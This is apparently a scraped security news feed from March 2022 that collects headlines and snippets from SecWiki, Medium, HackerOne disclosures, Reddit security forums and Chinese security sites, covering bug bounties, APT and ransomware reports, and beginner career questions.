  • Open

    SecWiki News 2022-03-23 Review
    Windows驱动签名经验贴 by yunshanwuyin 初探Shellcode免杀 by yunshanwuyin 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-23 Review
    Windows驱动签名经验贴 by yunshanwuyin 初探Shellcode免杀 by yunshanwuyin 更多最新文章,请访问SecWiki
  • Open

    Multiple ways to find sql and cheatsheet
    Comments out rest of the query.  Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing… Continue reading on Medium »
    Information Disclosure Bug
    Web security Continue reading on Medium »
    How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies
    Welcome back, I have not produced a writeup in over a week due to hunting for further vulnerabilities on Hall Of Fame sites, many of which… Continue reading on Medium »
    My Pentest Log -11- (CSRF in ASP)
    Greetings everyone from the Basilica, Continue reading on Medium »
    Zenlink Partners with Immunefi and Launches Bug Bounty
    March 23, 2022 — We are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Zenlink Foundation Ltd. »
    Supply Chain Attacks: A ripe area for research
    Let’s discuss about Supply Chain Attacks and why it’s a great research area in the recent times. Continue reading on Pentester Academy Blog »
    No Rate Limit at Reset Password Endpoint can Lead to account takeover (APPLE CORP)
    In The First This is my first writeup so forgive for anything or any mistake or you can send to me to share your knowledge or increase… Continue reading on Medium »
  • Open

    Bypassing domain deny_list rule in Smokescreen via trailing dot leads to SSRF
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1410214 - Bounty: $1500
    XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
    pixiv disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1503601 - Bounty: $500
  • Open

    Operation Dragon Castling: APT group targeting betting companies - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    Another Vulnerability in the LPC55S69 ROM
    Article URL: https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom Comments URL: https://news.ycombinator.com/item?id=30778778 Points: 137 # Comments: 46
  • Open

    戴尔曝出五大漏洞,影响数百万 Inspiron、Vostro、XPS、Alienware 系统
    戴尔BIOS存在五个新的安全漏洞,如果这些漏洞被黑客利用,可能会导致在易受攻击的系统上执行代码。
    FreeBuf早报 | 黑客泄露37GB微软源代码;白宫共享应对俄网络攻击清单
    黑客组织泄露了微软37GB的源代码,这些代码与包括Bing和Cortana在内的数百个项目有关。
    斗象科技CEO谢忱:中美网安市场分化明显,“平行宇宙”初现
    一个独特的、平行于海外的“中国网安宇宙”已经显现。
    NFC竟也存在高危漏洞?看他如何分析(CVE-2021-0870)
    NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。
    《DRP数字风险防护2021年度报告》重磅发布
    正确地应对数字化转型风险,可以让企业充分利用数字化转型技术,真正享受到数字化转型所带来的收益。
    Okta正在调查遭Lapsus$组织勒索的数据泄露事件
    身份验证服务和身份与访问管理(IAM)解决方案领先提供 Okta近期表示,他们正在调查遭勒索的数据泄露事件。
    ELTA 遭受勒索软件攻击,希腊公共邮政服务下线
    希腊国有邮政服务供应商 ELTA 遭到勒索软件攻击,使其大部分服务处于离线状态。
    微软确认遭Lapsus$ 勒索组织入侵
    微软已经确认他们的一名员工受到了 Lapsus$ 黑客组织的入侵,使得黑客访问和窃取了他们的部分源代码。
    雀巢遭Anonymous组织攻击 致10GB敏感资料外泄
    近日,国际黑客组织“匿名者”(Anonymous)宣布,他们成功攻击了雀巢公司。
    乱杀之你的密钥被我看见了
    知识多多益善。
    揭秘!女主播和男运营的那些“公关”套路
    近些年来,直播经济迅猛发展,催生了一大批网红主播。
    百行征信有限公司招聘安全管理岗
    诚招安全管理岗(初级-中级),央行直属、六险两金、人才住房、包两餐。
    SaaS间连接可能成为网络安全的重大威胁
    当前要解决的最大挑战是缺乏对用户活动和数据的可见性,其次是了解所有正在使用的SaaS应用程序并进行统一管理。
  • Open

    Anatomy of a Ghost CVE
    Article URL: https://daniel.haxx.se/blog/2022/03/23/anatomy-of-a-ghost-cve/ Comments URL: https://news.ycombinator.com/item?id=30776755 Points: 16 # Comments: 0
  • Open

    Random Stuff (Mac SW, Wallpapers, Images)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    深入理解反射式 dll 注入技术
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 一、前言 dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。 常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规d...
    Storm Cloud 黑客卷起大风暴:恶意软件 GIMMICK 攻击 MacOS
    译者:知道创宇404实验室翻译组 原文链接:https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ 2021年底,Volexity 发现了一起入侵事件,发生在网络安全监控服务的局部环境。Volexity 检测到一个运行frp的系统,或称为快速反...
  • Open

    深入理解反射式 dll 注入技术
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 一、前言 dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。 常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规d...
    Storm Cloud 黑客卷起大风暴:恶意软件 GIMMICK 攻击 MacOS
    译者:知道创宇404实验室翻译组 原文链接:https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ 2021年底,Volexity 发现了一起入侵事件,发生在网络安全监控服务的局部环境。Volexity 检测到一个运行frp的系统,或称为快速反...
  • Open

    road map
    to the kind people, can someone please create a computer forensics road map for beginners? mentioning the os types, the tools? the resources to learn and find practice material? submitted by /u/ItchyPilot9804 [link] [comments]
    Portscanning and malware in Encase8
    Hello all! I was hoping to see if anyone could help me with a school project I'm working on that has me a bit lost in the woods. We just learned about portscanning and malware in class but unlike many of our other classes we did not do a lab to help us understand the process required to gather the information. The assignment gave us two forensically imaged drives, one was the source of the alleged attack (a student) and the 'victim' was another (the teacher). I have my suspicions (based on the class) that the scan was not malicious but the product of a malware attack through open ports, but that's what I want to find out! I just started using encase8 (moved from encase6), so my proficiency is abysmal currently with the new UI. For those who have experience out there, what should I be looking at first? programs to use that may be better than encase (and free)? My gut says to try and find programs of execution and build a timeline. What should I be looking at? svchost.exe? AppData? ShimCache? (probably all of these but to be honest I don't know what I'm looking for because I don't know where to start) What does evidence of portscanning 'look' like? submitted by /u/SkitzTheFritz [link] [comments]

  • Open

    Hacking, Spyware & The Internet of Things
    In September 2021, my iPhone was remotely wiped after glitching for a few weeks. The phone was given to me by my ex who I currently have an order of protection against arising from a domestic violence incident in March of 2020. He always knew things he shouldn’t have but I thought he was physically going through my phone but realized after this happened that a few instances would have required remote access. My order of protection expires in less than 2 weeks and I need help. He is not technologically savvy but owns several companies with internal IT Departments and has the financial resources to do most of what is possible in the world of tech stalking and hacking. Within 2 days of my phone being wiped, every one of my accounts was hacked (except my gmail that had my Mother’s phone numb…
    Anyone know how to add a new root certificate into the 'Brave' browser?
    I need to MitM myself for a personal project. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]
    Would you / Do you use a virtualized firewall on the Cloud? What are the benefits?
    Some vendors offer firewall solutions for the cloud (mostly PA with VMSeries, CheckPoint with Quantum and Fortinet with Fortigate afaik). These are pretty much the same software/firmware they have on physical firewalls, but they virtualize it and put it on cloud instances, then you configure your traffic to go trough them. Do you use any of these solutions? If yes, why? Do you like them? I want to understand more about their benefits and downsides. What i can see as benefits are: More visibility (L7) and control over the CSP's native firewall Integrated threat intelligence and other AI/ML features Other bonus features (DNS security, for example) And downsides would be: Additional cost when you already have your CSP firewall for "free" Single point of failure, hard to setup and mantain (i think?) Same security benefits can be achieved using more cloud-native tooling (i think?) What do you think? Do you or would you use one of those? Personally i think the downsides outweight the benefits, but I would love to hear differing opinions. submitted by /u/lacioffi [link] [comments]
    I'm going to be going to hospital for a little while; I was planning to use RealVNC on my phone to use my home office while there. I'm assuming this will be okay to use for 2-3 weeks then i can uninstall it all?
    I don't know too much; forgive my ignorance. I've never had to do any remote-ing outside of my home office but I cannot avoid the surgery of course. submitted by /u/Buttercup59129 [link] [comments]
    Need an advice about my career
    Hi; I have a basic knowledge in programming but I can understand the code to a certain level. And I play CTF challenges, and I can say that I am a beginner but I have a good understanding of the flaws except I still struggle in exploiting some vulnerabilities. But in the matter of knowing what is happening I can tell a lot and identify vulnerabilities but I can't exploit all of them. I really need an advice or a suggestion about what can I do with my actual knowledge. And if I can use it to find a job according to my current level. Or I need to improve my skills more to find a job. (I really need a job asap) submitted by /u/xmrchaos [link] [comments]
    What features would make my ISO 27002 Explorer even better?
    I've created the ISO 27002 Explorer for information security professionals. You can use it to search through the ISO 27002 security controls and filter on different attributes. 👉️ What features should I add to make it even more useful? I already got the following suggestions on my original post: display the 2013 version controls a 2022 version control may replace –🙏🏻 u/dogpupkus, trying to add this by tomorrow; a button to remove filters – also u/dogpupkus – don't think that's possible on the #nocode platform I'm using; add the full control text – can't do that bc of copyright, though I'm thinking of adding translations, see this thread for an example; would I like a beer/coffee or something? 🍻 u/RHvdW very nice of you, you can help me by engaging with @iso27diy Have fun and let me know what you think! submitted by /u/But-I-Am-a-Robot [link] [comments]
    How does response manipulation via a mitm proxy like burp lead to bugs?
    https://ashutoshmishra00x0.medium.com/account-takeover-via-response-manipulation-worth-1800-ffb242cc55c9 Take this for example leads to an otp bypass and acccount take over setting success false to success true. Considering the response is just for the client to see how does this effect the server at all? Is the server sometimes programmed to poll specific endpoint responses and serve a page based on that? If so is there any interesting way to simulate this behavior in a local environment as maybe a capture the flag? I wanna see why and how it works so I can continue to find them more in the wild it just never made sense to me. Like requests is obvious the server parses the input and does transformations sometimes reflects it etc but responses I have no clue why spoofing responses would work. submitted by /u/Academic-Discount252 [link] [comments]
    Self-taught outside of the US
    Last time I asked you if it was possible to work in cyber security without being an ex-engineer, I got so many useful replies (thank you again!!) but I forgot to mention that I live in Europe (France). So now I’m once again losing hope because I don’t know if everything I’m learning will ever grant me a job. Here having a degree is mandatory so I’m stuck Do you know of people hired in the US coming from outside ? Are people still getting visa sponsorships or did that become exceptional ? And finally, what do you think of the IT industry in Canada ? Thanks again for helping me I’m by myself on this path so your advice is very valuable submitted by /u/No-Lead497 [link] [comments]
  • Open

    Ricochet reborn: We are building a user friendly TORChat (Ricochet) for GNU/Linux, MacOS and Windows
    submitted by /u/SpeekSecure [link] [comments]
    [CFP] Call for paper/tools/workshop for THREAT CON 2022 is now live
    submitted by /u/nyoface [link] [comments]
    OpenSSH phishing FIDO token protected keys (PoC)
    submitted by /u/ssh-mitm [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports
    submitted by /u/0xdea [link] [comments]
    Multiple Vulnerabilities in GARO Wallbox
    submitted by /u/eddit__plus [link] [comments]
    RomHack 2022 CFP is Open!
    submitted by /u/smaury [link] [comments]
  • Open

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »
  • Open

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »
  • Open

    Incorrect Authorization Checks in /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081137
    Arbitrary File Deletion via Path Traversal in image-edit.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081878
    Potential Authentication Bypass through "autologin" feature
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081986
    Regexes with large repetitions on empty sub-expressions take a very long time to parse
    Internet Bug Bounty disclosed a bug submitted by addisoncrump: https://hackerone.com/reports/1518036 - Bounty: $4000
    The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1379656 - Bounty: $100
    Race condition on action: Invite members to a team
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1285538 - Bounty: $100
    The endpoint /api/internal/graphql/requestAuthEmail on Khanacademy.or is vulnerable to Race Condition Attack.
    Khan Academy disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1293377
    Web Cache poisoning attack leads to User information Disclosure and more
    Lyst disclosed a bug submitted by deksterh1: https://hackerone.com/reports/631589 - Bounty: $300
    [https:///]&&[https:///] Open Redirection
    Lyst disclosed a bug submitted by mandark: https://hackerone.com/reports/537047 - Bounty: $300
    html injection via invite members can be leads account takeover
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1443567 - Bounty: $150
  • Open

    DEV-0537 criminal actor targeting organizations for data exfiltration and destruction - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    OffSecOps: Using Jenkins For Red Team Tooling
    submitted by /u/dmchell [link] [comments]
  • Open

    Secularism vs Individual Rights in Karnataka + Cost of Living in Spain + More
    On this 5th edition of the discursus Protest Analytics newsletter — March 22, 2022 Continue reading on discursus.io »
    Ukraine — Point de situation au 23 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Taco Bell Born X Raised Shirt
    Buy : https://teespring.com/en-GB/taco-bell-born-x-raised-shirt Continue reading on Medium »
  • Open

    Caso de uso não autorizados de chave da API do Google Maps
    Fala galera, Continue reading on Medium »
    The mystery of SQLMap’s --eval
    Master the power of exploiting most complex SQL injections Continue reading on InfoSec Write-ups »
    Stumbling into the bug of another
    The work of another bug hunter is staring back at you. Is your job half done? Continue reading on Medium »
  • Open

    Lsass.exe spawning werfault.exe
    Hi Folk, Today i found the suspicious behaviour on two DC's inside the network where, lsass.exe spawned the process of werfault.exe . While doing investigation i was not able to get any artifact that indicates that servers might be compromised. I detected this thing on SIEM and EDR logs doesn't mentions the process lineage. Can you people help me? submitted by /u/i_whiteheart [link] [comments]
    Autopsy for Network forensic analysis
    As far as I know tools like wiresharks, burpsuit are the go to application for network forensic. But When I am playing with autopsy I found out that it can get browser activities, cookies info. So are there more options to analyze network related activities through Autopsy? or any plugins that can be used for this purpose ? Edit : This might not makes sense probably and I have not find any articles related to the above online. I am just curious and love to know if it's an option submitted by /u/madladmary [link] [comments]
    Presentation topics
    I am an IR professional and I am doing a presentation to Digital Forensics students in a couple of months. Any recommendations for topics I should touch on? Any DF students out there have any suggestions on what they would like to hear from an IR person? submitted by /u/Digital_forensicator [link] [comments]
    GCIH or GCFA?
    I am looking to get my first GIAC cert and its between these two. I already have two years of cybsec experience as an analyst and have the a+, sec+ and cysa+ under my belt. I want to move on to something a little more challenging. I’d love to take a jab at GCFA but I am afraid its wayyyyy to advanced for me. How likely are you recommend someone to jump into this? Or would you recommend me going after a different cert before this? I am trying to sharpen my IR skills. submitted by /u/Enes_24 [link] [comments]
  • Open

    SecWiki News 2022-03-22 Review
    SecWiki周刊(第420期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-22 Review
    SecWiki周刊(第420期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Top 4 Books to learn Web Browser Security in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    OpenSSL BN_mod_sqrt() exploit published (CVE-2022-0778)
    Article URL: https://github.com/drago-96/CVE-2022-0778 Comments URL: https://news.ycombinator.com/item?id=30765727 Points: 1 # Comments: 0
  • Open

    关于如何更好地呈现红蓝对抗价值的思考
    虽然红蓝对抗机制和蓝军团队建设的经验和思考笔者已经通过不同渠道(博客、公众号、公开演讲等)多次分享了,但是今天 … 继续阅读关于如何更好地呈现红蓝对抗价值的思考 →
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    FreeBuf早报 | LAPSUS$组织入侵微软DevOps帐户;牙科护理数据泄露,或影响一百万人
    LAPSUS$ 组织入侵了微软的 DevOps 帐户,声称可以访问微软的一些 DevOps 资源。
    “CryptoRom ” 骗局盯上了移动用户
    犯罪分子诱导受害者进行股票投资、赌博等,进行诈骗活动,这种行为被称为杀猪盘。
    黑客在推特上披露新版Conti勒索软件源代码
    近日,黑客在推特上公开披露了新版本Conti勒索软件源代码。
    与俄罗斯有关的InvisiMole组织对乌克兰发动鱼叉式网络钓鱼攻击
    乌克兰计算机紧急事件响应政府小组 (CERT-UA)声称UAC-0035组织针对乌克兰国家机构发起鱼叉式网络钓鱼邮件攻击。
    意大利数据隐私监管机构对卡巴斯基展开调查
    当局正核实这家俄罗斯安全公司究竟是如何处理本国用户数据,以及是否存在将收集到的信息转移到欧盟以外的地区。
    巨头杀手,Lapsus$勒索组织称入侵了Microsoft 源代码存储库
    在短短几个月的时间里,Lapsus$ 勒索组织成功入侵了NVIDIA 、三星、育碧、Mercado Libre 和沃达丰等其他知名公司。
    “1337”挖矿组织活动分析
    <h2 id="h2-1"><strong>1.概述</strong></h2><p>2022年2月初,哈工大安天联合C
  • Open

    JVM Shellcode 注入探索
    作者:p1ay2win@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A 前言 随着RASP技术的发展,普通webshell已经很难有用武之地,甚至是各种内存马也逐渐捉襟见肘。秉承着《JSP Webshell那些事——攻击篇(上)》中向下走的思路,存不存在一种在Java代码中执行机器码的方法呢?答案是肯定的,常见的注...
    毒蛇,禁止滑动 ! 新的后门攻击法国实体
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain 主要发现 Proofpoint 识别了一个有针对性的攻击,黑客利用一个开源软件包安装程序 Cho...
  • Open

    JVM Shellcode 注入探索
    作者:p1ay2win@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A 前言 随着RASP技术的发展,普通webshell已经很难有用武之地,甚至是各种内存马也逐渐捉襟见肘。秉承着《JSP Webshell那些事——攻击篇(上)》中向下走的思路,存不存在一种在Java代码中执行机器码的方法呢?答案是肯定的,常见的注...
    毒蛇,禁止滑动 ! 新的后门攻击法国实体
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain 主要发现 Proofpoint 识别了一个有针对性的攻击,黑客利用一个开源软件包安装程序 Cho...

  • Open

    MRI pictures
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    A lot of anime, movies and shows
    https://setnomanime.me/0:/ submitted by /u/Isolatedleliel [link] [comments]
    Very Large OD full of software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    What are the Best Security Testing Tools (Open Source)?
    Seeking a reliable security testing tool can be overwhelming, given how large the opsec environment has grown over these last few years. Given how large things have grown, it’s become common to overcharge people in the industry for security services provided. Due to this factor, it’s very beneficial for any small business or organization to consider their options in terms of free and open-source software available out there if on a budget. There are many free & open source security testing tools available out there, but the best places to look are with Github, reliable search engines, and within the infosec/opsec sphere of blogs and forums. Continue reading What are the Best Security Testing Tools (Open Source)? at Sucuri Blog.
  • Open

    Blue Team Junior Analyst Review
    Entry level blue team training courses from Security Blue Team Continue reading on Medium »
    Ukraine — Point de situation au 22 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Hedef Sistem veya Sistemler Hakkında Bilgi Toplama
    Merhaba arkadaşlar bu yazımda sizlere hedef veya hedefler hakkında bilgi toplama aşamasından ve bilgi toplama araçlarından bahsetmeye… Continue reading on Medium »
    Active Directory Certificate Services: Domain Dominance
    When I’m taking part in a penetration test or red team engagement, I love digging down into the intricacies of Active Directory… Continue reading on Medium »
  • Open

    what are the resources or references pentesters use to find exploits on known vulnerabilities?
    Thanks in advance, after doing a vuln scan and detecting new vulns, what do you do next to get the resources or information needed to exploit the vulnerability? submitted by /u/rleekc [link] [comments]
    Managed Security Services Recommendation
    Does anyone have any recommendations for some reputable MSSPs? We have looked at Trustwave and SecureWorks so far. Trustwave can manage our firewalls for us, but they lack endpoint security, whereas SecureWorks does endpoint security, but they do not manage firewalls. I am really looking for a company that will manage Palo Alto firewalls as well as do endpoint security. submitted by /u/Thavus [link] [comments]
    Intel lists for Cracked Software / Warez domains?
    Hey all, I had an idea about proactively ingesting lists of domains which are for cracked software / warez to block them in my proxy. While i could scrape search engines looking for sites, it would be easier if there was an intel list i could pull from daily that is already managed and kept up to date. Does anyone here know of such a list, or any better way to gather this data? Thanks submitted by /u/truedoom [link] [comments]
    AAA
    Hello everybody! I am new to the AAA server (ISE) and I would be thankful if you can suggest some videos that can explain it clearly for me as a beginner! Thank you. submitted by /u/Murky_Fee5417 [link] [comments]
    Best throwaway email service?
    I'm looking for an email service that allows for you to create an email address and use it for either sending emails briefly, using it to create an account that wont last long, or so on. I swear ProtonMail used to have a feature where email addresses can self destruct after a pre-determined amount of time, but I am not seeing this feature today. Can anyone recommend a good service that works like the above? submitted by /u/JamieOvechkin [link] [comments]
  • Open

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Shielder - Reversing embedded device bootloader (U-Boot) - p.2
    submitted by /u/smaury [link] [comments]
    CVE-2022-0811 : New Vulnerability in CRI-O Engine Lets Attackers Escape Kubernetes Containers
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Initial access via rtlo attack
    submitted by /u/exandroiddev [link] [comments]
  • Open

    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
  • Open

    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
  • Open

    Log4j Java RCE in [beta.dev.adobeconnect.com]
    Adobe disclosed a bug submitted by sheikhrishad0: https://hackerone.com/reports/1442644
    Arbitrary file read via the bulk imports UploadsPipeline
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1439593 - Bounty: $29000
    Get all personal email IDs of Glassdoor users[No user interaction required]
    Glassdoor disclosed a bug submitted by safehacker_2715: https://hackerone.com/reports/864783 - Bounty: $1500
  • Open

    SecWiki News 2022-03-21 Review
    五十年跌宕起伏,恶意软件进化路 by Avenger 编写信息安全规划的几点经验 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-21 Review
    五十年跌宕起伏,恶意软件进化路 by Avenger 编写信息安全规划的几点经验 by ourren 更多最新文章,请访问SecWiki
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    Log Sources for Digital Forensics: Windows and Linux
    submitted by /u/ogunal00 [link] [comments]
    APT35 Automates Initial Access Using ProxyShell
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    FreeBuf早报 | 2021年英国NFT诈骗案飙升400%;韩国黑客组织攻击澳门酒店
    FBI发布了一份联合网络安全公告,警告 AvosLocker 勒索软件针对美国多个关键基础设施的攻击。
  • Open

    Western Digital EdgeRover App: Elevated Privileges Windows, macOS CVE-2022-22998
    Article URL: https://www.bleepingcomputer.com/news/security/western-digital-app-bug-gives-elevated-privileges-in-windows-macos/ Comments URL: https://news.ycombinator.com/item?id=30749920 Points: 2 # Comments: 0
  • Open

    基于 tp240dvr 服务的新型反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ 0x00 概述 2022年2月Cloudflare首次披露黑客利用tp240dvr(又称TP-240驱动程序)服务发起的新型反射放大攻击,放大倍数超过40亿,之后国内外多个安全团队针对此类攻击进行过解读。 百度智云盾在关注到此类攻击后,进行了深入分析,我们确认...
  • Open

    基于 tp240dvr 服务的新型反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ 0x00 概述 2022年2月Cloudflare首次披露黑客利用tp240dvr(又称TP-240驱动程序)服务发起的新型反射放大攻击,放大倍数超过40亿,之后国内外多个安全团队针对此类攻击进行过解读。 百度智云盾在关注到此类攻击后,进行了深入分析,我们确认...

  • Open

    Pages banned by other pages is still able to take action on event(comment+post)
    Vuln Type Privacy / Authorization Continue reading on Medium »
    Wombat Exchange 漏洞賞金計劃正式上線
    贏取高達 US$100,000 的賞金! Continue reading on Wombat Exchange »
    Insecure Direct Object Reference
    Let us learn about IDOR Continue reading on Medium »
    What Is A Bug Bounty Program?
    Companies spend a part of their budget in different areas such as marketing to improve their position and people’s opinion, but there is… Continue reading on Medium »
    ultimate and advance way to find xss!
    What is XSS? Continue reading on Medium »
    fstScan — Massive Vulnerability scanner.
    fstScan is a fastest tool to scan an entire website. Continue reading on Medium »
    Launching Wombat Exchange Bug Bounty Program
    Get up to US$100,00 in Rewards! Continue reading on Medium »
    A Study of Double-Write Bypass for SQLMap — Tamper
    Introduction Continue reading on Medium »
    Broken session control leads to access private videos using the shared link even after revoking the…
    A lot of people might know how to share the private video and can access that video but here the interesting thing is now this… Continue reading on Medium »
    Top Ethical Hacking Tools and Software for 2022
    A detail blog on Top hacking tool which is used by skill hackers ! Continue reading on InfoSec Write-ups »
  • Open

    Linux EDR testing: simple to extend but realistic initial access test case and ideas where to focus when testing
    submitted by /u/4lreadytekken [link] [comments]
    GitHub - fgsect/FitM: FitM, the Fuzzer in the Middle, can fuzz client and server binaries at the same time using userspace snapshot-fuzzing and network emulation. It's fast and comparably easy to set up.
    submitted by /u/domenukk [link] [comments]
    Xepor: the web routing framework, brings the best of mitmproxy & Flask
    submitted by /u/ttimasdf [link] [comments]
  • Open

    Testing EDRs for Linux — Things I wish I knew before getting started
    Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case. Continue reading on Medium »
    LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)
    Very Total, Much Security Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 21 mars
    Les dernières 24h Continue reading on Medium »
    Recon-ng: Powerful Reconaissance Tool
    Introduction Continue reading on Medium »
    A Sneak Peek into the Forbidden State: Exploring the CyberSpace of North Korea
    [0x0] The Beginning Continue reading on Medium »
    THE ART OF SOCK PUPPET
    Sock Puppet is an alternative online identity or in simple words it’s a Fake account Continue reading on Medium »
    OSINTGRAM : Gather Instagram Target Information (Step-by-Step Guide)
    In this guide I will be showing you how to install and use the functions of Osintgram in Kali Linux. Continue reading on System Weakness »
    US defense budget allocation for language interpretation
    https://www.youtube.com/watch?v=sr54QBU2lBc Continue reading on Medium »
  • Open

    Fully understand SYN Flood (TCP backlog and other stuff)
    Hey,I have multiple questions about the subject: I do know what port states are (Like listen,syn_recived, established, etc).But I don't understand exactly how the TCB queue works with them.Does the kernel open a new TCB every time the port state needs to be changed or something else? If so, does it necessarily needs to be a syn attack? it can be also an "ack" attack or every other state name attack. I think the only advantage is that syn is faster to send in massive traffic. I didn't understand if today the famous OS like RedHat Linux, windows server, windows home, etc do limit the backlog by default or not. I saw different sources say different things.Usually, organizations manually limit the TCP backlog (I know it depends), or just trust third-party systems like Big-IP of F5? IP and port spoofing is necessary for the attack? The victim's OS won't create a new TCB if I won't change my socket? If clause 2 is right, third party solutions also implement the same method of syn cookies on any other possible state? Thanks! submitted by /u/Webly99 [link] [comments]
    What should I use to share secret with someone of another company (client) ?
    In this case I can't have physical access to the person. submitted by /u/that_random_bear [link] [comments]
    Guide for how to design an account system?
    My company is overhauling its customer account system for our website, moving from simple username and password to having some form of 2FA. Now’s also a good time for us to go through all of our policies, such as the process for password reset, what to do if a customer no longer has access to their email, what to do if they no longer have access to their second-factor, if their phone number changed and they forgot to update it… lots of little questions that go into having a secure account system. Is there a book or long guide with current industry best practices? Thanks. submitted by /u/tvtb [link] [comments]
  • Open

    SecWiki News 2022-03-20 Review
